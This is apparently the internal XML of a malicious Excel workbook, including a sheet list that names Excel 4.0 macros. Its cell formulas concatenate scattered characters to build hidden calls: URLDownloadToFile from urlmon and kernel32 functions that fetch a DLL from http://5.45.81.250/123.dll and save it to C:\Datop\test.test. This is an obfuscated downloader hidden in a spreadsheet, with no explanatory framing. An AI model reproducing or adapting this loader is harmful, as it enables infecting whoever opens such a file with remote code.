        <f>TEXT('Shq1'!E2&amp;'Shq1'!H1&amp;'Shq1'!F9&amp;'Shq1'!E21&amp;'Shq1'!E2&amp;R11,3)</f>
        <v>eateDi</v>
      </c>
    </row>
    <row r="20" spans="2:18" x14ac:dyDescent="0.25">
      <c r="B20" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!G6&amp;'Shq1'!M27&amp;'Shq1'!K27&amp;'Shq1'!R7&amp;'Shq1'!H1&amp;'Shq1'!F9&amp;'Shq1'!M1&amp;'Shq1'!N10&amp;'Shq1'!K27&amp;'Shq1'!F9&amp;'Shq1'!E2&amp;'Shq1'!T14&amp;'Shq1'!F9&amp;'Shq1'!K29&amp;'Shq1'!F9&amp;'Shq1'!E2&amp;'Shq1'!T14&amp;'Shq1'!F9&amp;'Shq1'!F34&amp;'Shq1'!F37,44)</f>
        <v>"C:\Datop\test.test",</v>
      </c>
    </row>
    <row r="21" spans="2:18" x14ac:dyDescent="0.25">
      <c r="R21" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!Q2&amp;'Shq1'!Q2,67)</f>
        <v>"JJ</v>
      </c>
    </row>
    <row r="26" spans="2:18" x14ac:dyDescent="0.25">
      <c r="G26" s="1" t="s">
        <v>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3:Q10"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="5:17" x14ac:dyDescent="0.25">
      <c r="O3" s="1" t="str">
        <f>_xlfn.CONCAT('Shq2'!B13,'Shq2'!G26,'Shq2'!B20,'Shq2'!F11)</f>
        <v>0,"h"&amp;"t"&amp;"t"&amp;"p://5.45.81.250/123.d"&amp;"l"&amp;"l","C:\Datop\test.test",0,0)</v>
      </c>
    </row>
    <row r="4" spans="5:17" x14ac:dyDescent="0.25">
      <c r="G4" s="1" t="str">
        <f>_xlfn.CONCAT('Shq2'!J2,'Shq2'!O3,'Shq2'!Q6,'Shq1'!O13,'Shq1'!D51)</f>
        <v>yA","JCJ","C:\Datop",0)</v>
      </c>
    </row>
    <row r="7" spans="5:17" x14ac:dyDescent="0.25">
      <c r="E7" s="1" t="str">
        <f>_xlfn.CONCAT('Shq2'!E2,'Shq2'!H5)</f>
        <v>nel32","C</v>
      </c>
    </row>
    <row r="8" spans="5:17" x14ac:dyDescent="0.25">
      <c r="Q8" s="1" t="str">
        <f>_xlfn.CONCAT('Shq2'!D10,'Shq2'!R21,)</f>
        <v>A","JJ</v>
      </c>
    </row>
    <row r="10" spans="5:17" x14ac:dyDescent="0.25">
      <c r="L10" s="1" t="str">
        <f>_xlfn.CONCAT('Shq2'!G1,'Shq2'!S4)</f>
        <v>lmon","URLDownloadT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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="13" baseType="lpstr">
      <vt:lpstr>Shq1</vt:lpstr>
      <vt:lpstr>Derdw1</vt:lpstr>
      <vt:lpstr>Shq2</vt:lpstr>
      <vt:lpstr>Shq3</vt:lpstr>
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>REREWEDWF</vt:lpstr>
      <vt:lpstr>Vgq1</vt:lpstr>
      <vt:lpstr>Vgq2</vt:lpstr>
      <vt:lpstr>Vgq3</vt:lpstr>
      <vt:lpstr>Vgq4</vt:lpstr>
      <vt:lpstr>Vgq5</vt:lpstr>
      <vt:lpstr>Vgq6</vt:lpstr>
      <vt:lpstr>Vgq7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2021-11-03T13:28:24Z</dcterms:modified>
</cp:coreProperties>
</file>